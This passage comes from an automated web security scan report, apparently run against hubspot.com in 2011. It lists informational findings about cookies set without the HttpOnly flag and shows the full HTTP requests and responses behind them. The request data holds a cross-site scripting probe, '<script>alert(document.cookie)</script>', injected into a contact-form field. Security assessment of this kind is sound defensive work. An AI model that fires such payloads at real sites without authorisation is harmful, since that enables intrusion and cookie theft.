Tc2JmFtcDttb2R1bGVpZCYjeDNkOzEwMTE2JmFtcDttYXhjb3VudCYjeDNkOzI1Ii8%2bDQo8bGluayByZWw9ImFsdGVybmF0ZSIgdHlwZT0iYXBwbGljYXRpb24vcnNzK3htbCIgdGl0bGU9Ikh1YlNwb3QgSW50ZXJuZXQgTWFya2V0aW5nIENhc2UgU3R1ZGllcyIgaHJlZj0iaHR0cCYjeDNhOyYjeDJmOyYjeDJmO3d3dy5odWJzcG90LmNvbSYjeDJmO0NNUyYjeDJmO1VJJiN4MmY7TW9kdWxlcyYjeDJmO0JpekJsb2dnZXImI3gyZjtyc3MuYXNweCYjeDNmO3RhYmlkJiN4M2Q7NTg2NjgmYW1wO21vZHVsZWlkJiN4M2Q7NDQ4ODcmYW1wO21heGNvdW50JiN4M2Q7MjUiLz4NCmQCAg9kFgICAw9kFgICAw9kFgICAQ9kFgQCAw9kFgZmD2QWAgIED2QWAmYPZBYCZg9kFgJmDxYCHwAF3AU8b2JqZWN0IHN0eWxlPSJkaXNwbGF5OiBibG9jazsgbWFyZ2luLWxlZnQ6IGF1dG87IG1hcmdpbi1yaWdodDogYXV0bzsiIGNsYXNzaWQ9ImNsc2lkOmQyN2NkYjZlLWFlNmQtMTFjZi05NmI4LTQ0NDU1MzU0MDAwMCIgd2lkdGg9IjIwMCIgaGVpZ2h0PSIxMzciIGNvZGViYXNlPSJodHRwOi8vZG93bmxvYWQubWFjcm9tZWRpYS5jb20vcHViL3Nob2Nrd2F2ZS9jYWJzL2ZsYXNoL3N3Zmxhc2guY2FiI3ZlcnNpb249NiwwLDQwLDAiPgo8cGFyYW0gbmFtZT0iYWxsb3dGdWxsU2NyZWVuIiB2YWx1ZT0idHJ1ZSIgLz4KPHBhcmFtIG5hbWU9ImFsbG93c2NyaXB0YWNjZXNzIiB2YWx1ZT0iYWx3YXlzIiAvPgo8cGFyYW0gbmFtZT0ic3JjIiB2YWx1ZT0iaHR0cDovL3d3dy55b3V0dWJlLmNvbS92L20wVVF1Y1dNMFp3P2ZzPTEmYW1wO2hsPWVuX1VTIiAvPgo8cGFyYW0gbmFtZT0iYWxsb3dmdWxsc2NyZWVuIiB2YWx1ZT0idHJ1ZSIgLz48ZW1iZWQgc3R5bGU9ImRpc3BsYXk6IGJsb2NrOyBtYXJnaW4tbGVmdDogYXV0bzsgbWFyZ2luLXJpZ2h0OiBhdXRvOyIgdHlwZT0iYXBwbGljYXRpb24veC1zaG9ja3dhdmUtZmxhc2giIHdpZHRoPSIyMDAiIGhlaWdodD0iMTM3IiBzcmM9Imh0dHA6Ly93d3cueW91dHViZS5jb20vdi9tMFVRdWNXTTBadz9mcz0xJmFtcDtobD1lbl9VUyIgYWxsb3dzY3JpcHRhY2Nlc3M9ImFsd2F5cyIgYWxsb3dmdWxsc2NyZWVuPSJ0cnVlIj48L2VtYmVkPgo8L29iamVjdD5kAgEPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAWwBTxkaXYgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICNjOGM4Yzg7IGJhY2tncm91bmQtY29sb3I6ICNlZWVlZWU7IGJhY2tncm91bmQtaW1hZ2U6IG5vbmU7IGJhY2tncm91bmQtcmVwZWF0OiByZXBlYXQ7IGJhY2tncm91bmQtYXR0YWNobWVudDogc2Nyb2xsOyBiYWNrZ3JvdW5kLXBvc2l0aW9uOiAwJSAwJTsiPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTRweDsiPkh1YlNwb3QgaXMgY29tbWl0dGVkIHRvIG1ha2luZyBvdXIgY3VzdG9tZXJzIHN1Y2Nlc3NmdWwgd2l0aCBpbmJvdW5kIG1hcmtldGluZy4gQnV0IEh1YlNwb3QgaXNuJ3QgcmlnaHQgZm9yIGV2ZXJ5b25lLiA8YnIgLz48YnIgLz5Zb3UgcXVhbGlmeSBmb3IgYSBIdWJTcG90IHRyaWFsIGlmOjxiciAvPjxiciAvPiA8c3Ryb25nPio8L3N0cm9uZz4gVGhlIGdvYWwgb2YgeW91ciB3ZWJzaXRlIGlzIHRvIDxzdHJvbmc%2bZ2VuZXJhdGUgbGVhZHM8L3N0cm9uZz4gZm9yIHlvdXIgYnVzaW5lc3MuPGJyIC8%2bPGJyIC8%2bIDxzdHJvbmc%2bKjwvc3Ryb25nPiBZb3Ugd2FudCB0byB0YWtlIG9uIEludGVybmV0IG1hcmtldGluZyB5b3Vyc2VsZiwgYW5kIGhhdmUgPHN0cm9uZz50aW1lIGFuZCByZXNvdXJjZXM8L3N0cm9uZz4gc2V0IGFzaWRlIGZvciB0aGlzIHB1cnBvc2UuPC9wPgo8L2Rpdj5kAgIPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAX1BDxkaXYgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICNjOGM4Yzg7IGJhY2tncm91bmQtY29sb3I6ICNlZWVlZWU7IGJhY2tncm91bmQtaW1hZ2U6IG5vbmU7IGJhY2tncm91bmQtcmVwZWF0OiByZXBlYXQ7IGJhY2tncm91bmQtYXR0YWNobWVudDogc2Nyb2xsOyBiYWNrZ3JvdW5kLXBvc2l0aW9uOiAwJSAwJTsiPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTRweDsiPjxlbT4iU2luY2Ugc3RhcnRpbmcgd2l0aCBIdWJTcG90LCA8c3Ryb25nPndlYnNpdGUgdHJhZmZpYyBoYXMgbW9yZSB0aGFuIGRvdWJsZWQgPC9zdHJvbmc%2bZnJvbSA1MDAgdmlzaXRvcnMgcGVyIG1vbnRoIHRvIG92ZXIgMTAwMCwgPHN0cm9uZz5hbmQgPC9zdHJvbmc%2bPHN0cm9uZz5JIGhhdmUgYWxyZWFkeSBnZW5lcmF0ZWQgYSBudW1iZXIgb2YgbGVhZHMgdGhhdCBwYXkgZm9yIEh1YlNwb3QgMzAgdGltZXMgb3Zlci4iIDwvc3Ryb25nPjwvZW0%2bPC9wPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTNweDsiPjxlbT4tTm9lbCBIdWVsc2VuYmVjaywgUHJlc2lkZW50LCBWb2NpbyA8L2VtPjwvcD4KPC9kaXY%2bZAIED2QWAmYPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAXIBzxoND5PcHRpbWl6ZSB5b3VyIHdlYnNpdGUgdG8gPHN0cm9uZz5nZXQgZm91bmQ8L3N0cm9uZz4gYnkgbW9yZSBwcm9zcGVjdHMgYW5kIDxzdHJvbmc%2bY29udmVydCA8L3N0cm9uZz4gbW9yZSBvZiB0aGVtIGludG8gPHN0cm9uZz5sZWFkcyBhbmQgcGF5aW5nIGN1c3RvbWVyczwvc3Ryb25nPiB3aXRoIEh1YlNwb3QncyBpbmJvdW5kICBtYXJrZXRpbmcgc29mdHdhcmUuPC9oND4KPHA%2bPHN0cm9uZz4gPGltZyBzcmM9Ii9Qb3J0YWxzLzUzL2ltYWdlcy9IdWJTcG90X1NvZnR3YXJlLnBuZyIgYm9yZGVyPSIwIiBhbHQ9Ikh1YlNwb3QgU29mdHdhcmUiIGhzcGFjZT0iMCIgdnNwYWNlPSIwIiBjbGFzcz0iYWxpZ25SaWdodCIgc3R5bGU9ImZsb2F0OiByaWdodDsiIC8%2bPGJyIC8%2bWW91ciBGcmVlIFRyaWFsIG9mIEh1YlNwb3Q6IDwvc3Ryb25nPjwvcD4KPHVsPgo8bGk%2bR2l2ZXMgeW91IHRvb2xzIHRvIDxlbT5nZXQgZm91bmQgb25saW5lPC9lbT4gYnkgbW9yZSBxdWFsaWZpZWQgdmlzaXRvcnMuPC9saT4KPGxpPlNob3dzIHlvdSBob3cgdG8gPGVtPmNvbnZlcnQgbW9yZTwvZW0%2bIHZpc2l0b3JzIGludG8gbGVhZHMuPC9saT4KPGxpPkdpdmVzIHlvdSB0b29scyB0byA8ZW0%2bY2xvc2UgdGhvc2UgbGVhZHMgZWZmaWNpZW50bHk8L2VtPi48L2xpPgo8bGk%2bUHJvdmlkZXMgYW5hbHl0aWNzIHRvIGhlbHAgeW91IG08ZW0%2bYWtlIHNtYXJ0IG1hcmtldGluZyBpbnZlc3RtZW50czwvZW0%2bLjwvbGk%2bCjwvdWw%2bCjx1bD4KPC91bD4KPHA%2bPGJyIC8%2bWW91ciBmcmVlIHRyaWFsIGdpdmVzIHlvdSBhY2Nlc3MgdG8gYWxsIG9mIEh1YlNwb3QncyB0b29scyBhbmQgY3VzdG9tZXItb25seSByZXNvdXJjZXMuPC9wPgo8cD5UaGVyZSdzIDxzdHJvbmc%2bbm8gcmlzazwvc3Ryb25nPiwgPHN0cm9uZz5ubyBvYmxpZ2F0aW9uPC9zdHJvbmc%2bLCBhbmQgPHN0cm9uZz5ubyBjcmVkaXQgY2FyZDwvc3Ryb25nPiByZXF1aXJlZC48L3A%2bZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUVZG5uOklOR0VOSU1FTlUxOl9jdGwwIKoaNbs8%2flwSOS5lpqE0UiyhZtU%3d&dnn%3aINGENIMENU1%3a_ctl0=%0d&LeadGen_ContactForm_10273_m66219submitter_user_token=a3ef224db6434804a3e24ca05d84f49f&ContactFormId=10273&LeadGen_ContactForm_10273_m66219spam_check_key=jggksnhejohgplhhsqookmjojleogkigfklmeindumpwrhjglwdiswdwrthh&LeadGen_ContactForm_10273_m66219spam_check_sig=119116116120128123117114119124117116125121117117128126124124120122119124119121114124116120118116115120121122114118123113130122125132127117119116121132113118128132113132127129117117&LeadGen_ContactForm_10273_m66219%3aFirstName=%0d&LeadGen_ContactForm_10273_m66219%3aLastName=%0d&LeadGen_ContactForm_10273_m66219%3aEmail=%0d&LeadGen_ContactForm_10273_m66219%3aPhone=%0d&LeadGen_ContactForm_10273_m66219%3aCompany=%0d&LeadGen_ContactForm_10273_m66219%3aWebsite=%0d&LeadGen_ContactForm_10273_m66219%3aB2B_vs_B2C_PRELIM__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aEmployees__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aRole__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aMarketing_Company_auto__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aBiggest_Marketing_Challenge__c=%0d16368%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e396df5a84505c6ed9&LeadGen_ContactForm_Submit_LeadGen_ContactForm_10273_m66219=Start+Your+Free+Trial+Now&ScrollTop=%0d&__dnnVariable=%0d&hsFirstVisitHidden=http%25253A%25252F%25252Fwww.hubspot.com%25252Febooks%25252Ffacebook-page-marketing-ebook-2011%25252F%25253Fsource%25253Dhspd-InsideFacebook-200x200ad-201104%257chttp%25253A%25252F%25252Fwww.insidefacebook.com%25252F%257c2011-05-15%25252012%25253A53%25253A12

Response

HTTP/1.1 200 OK
Content-Length: 7550
Content-Type: text/css
Last-Modified: Thu, 31 Mar 2011 18:11:47 GMT
Accept-Ranges: bytes
ETag: "abf2c119cfefcb1:10188"
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 17:00:19 GMT
Connection: close
Set-Cookie: HUBSPOT130=68228268.20480.0000; path=/

/*
body > form > div {background:-webkit-gradient(radial,75% 164,1440,80% 44,240,from(rgba(255,255,255,1)),to(rgba(44,208,255,.1)),color-stop(.5,rgba(255,255,255,0)));}
*/
body > form > div > section
...[SNIP]...

11.105. http://www.hubspot.com/Portals/53/skins/hubspot/app/js/app.custom.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hubspot.com
Path:	/Portals/53/skins/hubspot/app/js/app.custom.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

HUBSPOT130=68228268.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Portals/53/skins/hubspot/app/js/app.custom.js HTTP/1.1
Host: www.hubspot.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hubspot.com/free-trial/Default.aspx?RewriteStatus=1&__VIEWSTATE=%2fwEPDwULLTEyNDEwNzkwMjkPZBYGZg8WAh4EVGV4dAUPPCFET0NUWVBFIGh0bWw%2bZAIBD2QWDgIBDxYCHgdWaXNpYmxlaGQCAg8WAh4HY29udGVudAVvR2V0IGEgZnJlZSB0cmlhbCBvZiB0aGUgSHViU3BvdCBpbmJvdW5kIG1hcmtldGluZyBzb2Z0d2FyZSB0byBoZWxwIGdlbmVyYXRlIG1vcmUgdmlzaXRvcnMsIGxlYWRzIGFuZCBjdXN0b21lcnMuZAIDDxYCHwJkZAIEDxYCHwIFFkNvcHlyaWdodCAoYykgMjAxMSBieSBkAgUPFgIfAgUISHViU3BvdCBkAgYPFgIfAmRkAg8PFgIfAAWoBDxsaW5rIHJlbD0iYWx0ZXJuYXRlIiB0eXBlPSJhcHBsaWNhdGlvbi9yc3MreG1sIiB0aXRsZT0iSHViU3BvdCBDb21wYW55ICZhbXA7YW1wJiN4M2I7IFByb2R1Y3QgTmV3cyBCbG9nIiBocmVmPSJodHRwJiN4M2E7JiN4MmY7JiN4MmY7d3d3Lmh1YnNwb3QuY29tJiN4MmY7Q01TJiN4MmY7VUkmI3gyZjtNb2R1bGVzJiN4MmY7Qml6QmxvZ2dlciYjeDJmO3Jzcy5hc3B4JiN4M2Y7dGFiaWQmI3gzZDs4NTc2JmFtcDttb2R1bGVpZCYjeDNkOzEwMTE2JmFtcDttYXhjb3VudCYjeDNkOzI1Ii8%2bDQo8bGluayByZWw9ImFsdGVybmF0ZSIgdHlwZT0iYXBwbGljYXRpb24vcnNzK3htbCIgdGl0bGU9Ikh1YlNwb3QgSW50ZXJuZXQgTWFya2V0aW5nIENhc2UgU3R1ZGllcyIgaHJlZj0iaHR0cCYjeDNhOyYjeDJmOyYjeDJmO3d3dy5odWJzcG90LmNvbSYjeDJmO0NNUyYjeDJmO1VJJiN4MmY7TW9kdWxlcyYjeDJmO0JpekJsb2dnZXImI3gyZjtyc3MuYXNweCYjeDNmO3RhYmlkJiN4M2Q7NTg2NjgmYW1wO21vZHVsZWlkJiN4M2Q7NDQ4ODcmYW1wO21heGNvdW50JiN4M2Q7MjUiLz4NCmQCAg9kFgICAw9kFgICAw9kFgICAQ9kFgQCAw9kFgZmD2QWAgIED2QWAmYPZBYCZg9kFgJmDxYCHwAF3AU8b2JqZWN0IHN0eWxlPSJkaXNwbGF5OiBibG9jazsgbWFyZ2luLWxlZnQ6IGF1dG87IG1hcmdpbi1yaWdodDogYXV0bzsiIGNsYXNzaWQ9ImNsc2lkOmQyN2NkYjZlLWFlNmQtMTFjZi05NmI4LTQ0NDU1MzU0MDAwMCIgd2lkdGg9IjIwMCIgaGVpZ2h0PSIxMzciIGNvZGViYXNlPSJodHRwOi8vZG93bmxvYWQubWFjcm9tZWRpYS5jb20vcHViL3Nob2Nrd2F2ZS9jYWJzL2ZsYXNoL3N3Zmxhc2guY2FiI3ZlcnNpb249NiwwLDQwLDAiPgo8cGFyYW0gbmFtZT0iYWxsb3dGdWxsU2NyZWVuIiB2YWx1ZT0idHJ1ZSIgLz4KPHBhcmFtIG5hbWU9ImFsbG93c2NyaXB0YWNjZXNzIiB2YWx1ZT0iYWx3YXlzIiAvPgo8cGFyYW0gbmFtZT0ic3JjIiB2YWx1ZT0iaHR0cDovL3d3dy55b3V0dWJlLmNvbS92L20wVVF1Y1dNMFp3P2ZzPTEmYW1wO2hsPWVuX1VTIiAvPgo8cGFyYW0gbmFtZT0iYWxsb3dmdWxsc2NyZWVuIiB2YWx1ZT0idHJ1ZSIgLz48ZW1iZWQgc3R5bGU9ImRpc3BsYXk6IGJsb2NrOyBtYXJnaW4tbGVmdDogYXV0bzsgbWFyZ2luLXJpZ2h0OiBhdXRvOyIgdHlwZT0iYXBwbGljYXRpb24veC1zaG9ja3dhdmUtZmxhc2giIHdpZHRoPSIyMDAiIGhlaWdodD0iMTM3IiBzcmM9Imh0dHA6Ly93d3cueW91dHViZS5jb20vdi9tMFVRdWNXTTBadz9mcz0xJmFtcDtobD1lbl9VUyIgYWxsb3dzY3JpcHRhY2Nlc3M9ImFsd2F5cyIgYWxsb3dmdWxsc2NyZWVuPSJ0cnVlIj48L2VtYmVkPgo8L29iamVjdD5kAgEPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAWwBTxkaXYgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICNjOGM4Yzg7IGJhY2tncm91bmQtY29sb3I6ICNlZWVlZWU7IGJhY2tncm91bmQtaW1hZ2U6IG5vbmU7IGJhY2tncm91bmQtcmVwZWF0OiByZXBlYXQ7IGJhY2tncm91bmQtYXR0YWNobWVudDogc2Nyb2xsOyBiYWNrZ3JvdW5kLXBvc2l0aW9uOiAwJSAwJTsiPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTRweDsiPkh1YlNwb3QgaXMgY29tbWl0dGVkIHRvIG1ha2luZyBvdXIgY3VzdG9tZXJzIHN1Y2Nlc3NmdWwgd2l0aCBpbmJvdW5kIG1hcmtldGluZy4gQnV0IEh1YlNwb3QgaXNuJ3QgcmlnaHQgZm9yIGV2ZXJ5b25lLiA8YnIgLz48YnIgLz5Zb3UgcXVhbGlmeSBmb3IgYSBIdWJTcG90IHRyaWFsIGlmOjxiciAvPjxiciAvPiA8c3Ryb25nPio8L3N0cm9uZz4gVGhlIGdvYWwgb2YgeW91ciB3ZWJzaXRlIGlzIHRvIDxzdHJvbmc%2bZ2VuZXJhdGUgbGVhZHM8L3N0cm9uZz4gZm9yIHlvdXIgYnVzaW5lc3MuPGJyIC8%2bPGJyIC8%2bIDxzdHJvbmc%2bKjwvc3Ryb25nPiBZb3Ugd2FudCB0byB0YWtlIG9uIEludGVybmV0IG1hcmtldGluZyB5b3Vyc2VsZiwgYW5kIGhhdmUgPHN0cm9uZz50aW1lIGFuZCByZXNvdXJjZXM8L3N0cm9uZz4gc2V0IGFzaWRlIGZvciB0aGlzIHB1cnBvc2UuPC9wPgo8L2Rpdj5kAgIPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAX1BDxkaXYgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICNjOGM4Yzg7IGJhY2tncm91bmQtY29sb3I6ICNlZWVlZWU7IGJhY2tncm91bmQtaW1hZ2U6IG5vbmU7IGJhY2tncm91bmQtcmVwZWF0OiByZXBlYXQ7IGJhY2tncm91bmQtYXR0YWNobWVudDogc2Nyb2xsOyBiYWNrZ3JvdW5kLXBvc2l0aW9uOiAwJSAwJTsiPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTRweDsiPjxlbT4iU2luY2Ugc3RhcnRpbmcgd2l0aCBIdWJTcG90LCA8c3Ryb25nPndlYnNpdGUgdHJhZmZpYyBoYXMgbW9yZSB0aGFuIGRvdWJsZWQgPC9zdHJvbmc%2bZnJvbSA1MDAgdmlzaXRvcnMgcGVyIG1vbnRoIHRvIG92ZXIgMTAwMCwgPHN0cm9uZz5hbmQgPC9zdHJvbmc%2bPHN0cm9uZz5JIGhhdmUgYWxyZWFkeSBnZW5lcmF0ZWQgYSBudW1iZXIgb2YgbGVhZHMgdGhhdCBwYXkgZm9yIEh1YlNwb3QgMzAgdGltZXMgb3Zlci4iIDwvc3Ryb25nPjwvZW0%2bPC9wPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTNweDsiPjxlbT4tTm9lbCBIdWVsc2VuYmVjaywgUHJlc2lkZW50LCBWb2NpbyA8L2VtPjwvcD4KPC9kaXY%2bZAIED2QWAmYPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAXIBzxoND5PcHRpbWl6ZSB5b3VyIHdlYnNpdGUgdG8gPHN0cm9uZz5nZXQgZm91bmQ8L3N0cm9uZz4gYnkgbW9yZSBwcm9zcGVjdHMgYW5kIDxzdHJvbmc%2bY29udmVydCA8L3N0cm9uZz4gbW9yZSBvZiB0aGVtIGludG8gPHN0cm9uZz5sZWFkcyBhbmQgcGF5aW5nIGN1c3RvbWVyczwvc3Ryb25nPiB3aXRoIEh1YlNwb3QncyBpbmJvdW5kICBtYXJrZXRpbmcgc29mdHdhcmUuPC9oND4KPHA%2bPHN0cm9uZz4gPGltZyBzcmM9Ii9Qb3J0YWxzLzUzL2ltYWdlcy9IdWJTcG90X1NvZnR3YXJlLnBuZyIgYm9yZGVyPSIwIiBhbHQ9Ikh1YlNwb3QgU29mdHdhcmUiIGhzcGFjZT0iMCIgdnNwYWNlPSIwIiBjbGFzcz0iYWxpZ25SaWdodCIgc3R5bGU9ImZsb2F0OiByaWdodDsiIC8%2bPGJyIC8%2bWW91ciBGcmVlIFRyaWFsIG9mIEh1YlNwb3Q6IDwvc3Ryb25nPjwvcD4KPHVsPgo8bGk%2bR2l2ZXMgeW91IHRvb2xzIHRvIDxlbT5nZXQgZm91bmQgb25saW5lPC9lbT4gYnkgbW9yZSBxdWFsaWZpZWQgdmlzaXRvcnMuPC9saT4KPGxpPlNob3dzIHlvdSBob3cgdG8gPGVtPmNvbnZlcnQgbW9yZTwvZW0%2bIHZpc2l0b3JzIGludG8gbGVhZHMuPC9saT4KPGxpPkdpdmVzIHlvdSB0b29scyB0byA8ZW0%2bY2xvc2UgdGhvc2UgbGVhZHMgZWZmaWNpZW50bHk8L2VtPi48L2xpPgo8bGk%2bUHJvdmlkZXMgYW5hbHl0aWNzIHRvIGhlbHAgeW91IG08ZW0%2bYWtlIHNtYXJ0IG1hcmtldGluZyBpbnZlc3RtZW50czwvZW0%2bLjwvbGk%2bCjwvdWw%2bCjx1bD4KPC91bD4KPHA%2bPGJyIC8%2bWW91ciBmcmVlIHRyaWFsIGdpdmVzIHlvdSBhY2Nlc3MgdG8gYWxsIG9mIEh1YlNwb3QncyB0b29scyBhbmQgY3VzdG9tZXItb25seSByZXNvdXJjZXMuPC9wPgo8cD5UaGVyZSdzIDxzdHJvbmc%2bbm8gcmlzazwvc3Ryb25nPiwgPHN0cm9uZz5ubyBvYmxpZ2F0aW9uPC9zdHJvbmc%2bLCBhbmQgPHN0cm9uZz5ubyBjcmVkaXQgY2FyZDwvc3Ryb25nPiByZXF1aXJlZC48L3A%2bZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUVZG5uOklOR0VOSU1FTlUxOl9jdGwwIKoaNbs8%2flwSOS5lpqE0UiyhZtU%3d&dnn%3aINGENIMENU1%3a_ctl0=%0d&LeadGen_ContactForm_10273_m66219submitter_user_token=a3ef224db6434804a3e24ca05d84f49f&ContactFormId=10273&LeadGen_ContactForm_10273_m66219spam_check_key=jggksnhejohgplhhsqookmjojleogkigfklmeindumpwrhjglwdiswdwrthh&LeadGen_ContactForm_10273_m66219spam_check_sig=119116116120128123117114119124117116125121117117128126124124120122119124119121114124116120118116115120121122114118123113130122125132127117119116121132113118128132113132127129117117&LeadGen_ContactForm_10273_m66219%3aFirstName=%0d&LeadGen_ContactForm_10273_m66219%3aLastName=%0d&LeadGen_ContactForm_10273_m66219%3aEmail=%0d&LeadGen_ContactForm_10273_m66219%3aPhone=%0d&LeadGen_ContactForm_10273_m66219%3aCompany=%0d&LeadGen_ContactForm_10273_m66219%3aWebsite=%0d&LeadGen_ContactForm_10273_m66219%3aB2B_vs_B2C_PRELIM__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aEmployees__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aRole__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aMarketing_Company_auto__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aBiggest_Marketing_Challenge__c=%0d16368%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e396df5a84505c6ed9&LeadGen_ContactForm_Submit_LeadGen_ContactForm_10273_m66219=Start+Your+Free+Trial+Now&ScrollTop=%0d&__dnnVariable=%0d&hsFirstVisitHidden=http%25253A%25252F%25252Fwww.hubspot.com%25252Febooks%25252Ffacebook-page-marketing-ebook-2011%25252F%25253Fsource%25253Dhspd-InsideFacebook-200x200ad-201104%257chttp%25253A%25252F%25252Fwww.insidefacebook.com%25252F%257c2011-05-15%25252012%25253A53%25253A12

Response

HTTP/1.1 200 OK
Content-Length: 364
Content-Type: application/x-javascript
Last-Modified: Thu, 17 Mar 2011 15:15:13 GMT
Accept-Ranges: bytes
ETag: "28d15c1db6e4cb1:10188"
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 17:00:20 GMT
Connection: close
Set-Cookie: HUBSPOT130=68228268.20480.0000; path=/

(function($){

   $(window).load(function() {


   });

$(document).ready(function() {

$('.radmenu').mouseleave(function() {
$('.radmenu *').css({
'visibility':'visible',
'z
...[SNIP]...

11.106. http://www.hubspot.com/Portals/53/skins/hubspot/app/js/app.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hubspot.com
Path:	/Portals/53/skins/hubspot/app/js/app.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

HUBSPOT130=68228268.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Portals/53/skins/hubspot/app/js/app.js HTTP/1.1
Host: www.hubspot.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hubspot.com/free-trial/Default.aspx?RewriteStatus=1&__VIEWSTATE=%2fwEPDwULLTEyNDEwNzkwMjkPZBYGZg8WAh4EVGV4dAUPPCFET0NUWVBFIGh0bWw%2bZAIBD2QWDgIBDxYCHgdWaXNpYmxlaGQCAg8WAh4HY29udGVudAVvR2V0IGEgZnJlZSB0cmlhbCBvZiB0aGUgSHViU3BvdCBpbmJvdW5kIG1hcmtldGluZyBzb2Z0d2FyZSB0byBoZWxwIGdlbmVyYXRlIG1vcmUgdmlzaXRvcnMsIGxlYWRzIGFuZCBjdXN0b21lcnMuZAIDDxYCHwJkZAIEDxYCHwIFFkNvcHlyaWdodCAoYykgMjAxMSBieSBkAgUPFgIfAgUISHViU3BvdCBkAgYPFgIfAmRkAg8PFgIfAAWoBDxsaW5rIHJlbD0iYWx0ZXJuYXRlIiB0eXBlPSJhcHBsaWNhdGlvbi9yc3MreG1sIiB0aXRsZT0iSHViU3BvdCBDb21wYW55ICZhbXA7YW1wJiN4M2I7IFByb2R1Y3QgTmV3cyBCbG9nIiBocmVmPSJodHRwJiN4M2E7JiN4MmY7JiN4MmY7d3d3Lmh1YnNwb3QuY29tJiN4MmY7Q01TJiN4MmY7VUkmI3gyZjtNb2R1bGVzJiN4MmY7Qml6QmxvZ2dlciYjeDJmO3Jzcy5hc3B4JiN4M2Y7dGFiaWQmI3gzZDs4NTc2JmFtcDttb2R1bGVpZCYjeDNkOzEwMTE2JmFtcDttYXhjb3VudCYjeDNkOzI1Ii8%2bDQo8bGluayByZWw9ImFsdGVybmF0ZSIgdHlwZT0iYXBwbGljYXRpb24vcnNzK3htbCIgdGl0bGU9Ikh1YlNwb3QgSW50ZXJuZXQgTWFya2V0aW5nIENhc2UgU3R1ZGllcyIgaHJlZj0iaHR0cCYjeDNhOyYjeDJmOyYjeDJmO3d3dy5odWJzcG90LmNvbSYjeDJmO0NNUyYjeDJmO1VJJiN4MmY7TW9kdWxlcyYjeDJmO0JpekJsb2dnZXImI3gyZjtyc3MuYXNweCYjeDNmO3RhYmlkJiN4M2Q7NTg2NjgmYW1wO21vZHVsZWlkJiN4M2Q7NDQ4ODcmYW1wO21heGNvdW50JiN4M2Q7MjUiLz4NCmQCAg9kFgICAw9kFgICAw9kFgICAQ9kFgQCAw9kFgZmD2QWAgIED2QWAmYPZBYCZg9kFgJmDxYCHwAF3AU8b2JqZWN0IHN0eWxlPSJkaXNwbGF5OiBibG9jazsgbWFyZ2luLWxlZnQ6IGF1dG87IG1hcmdpbi1yaWdodDogYXV0bzsiIGNsYXNzaWQ9ImNsc2lkOmQyN2NkYjZlLWFlNmQtMTFjZi05NmI4LTQ0NDU1MzU0MDAwMCIgd2lkdGg9IjIwMCIgaGVpZ2h0PSIxMzciIGNvZGViYXNlPSJodHRwOi8vZG93bmxvYWQubWFjcm9tZWRpYS5jb20vcHViL3Nob2Nrd2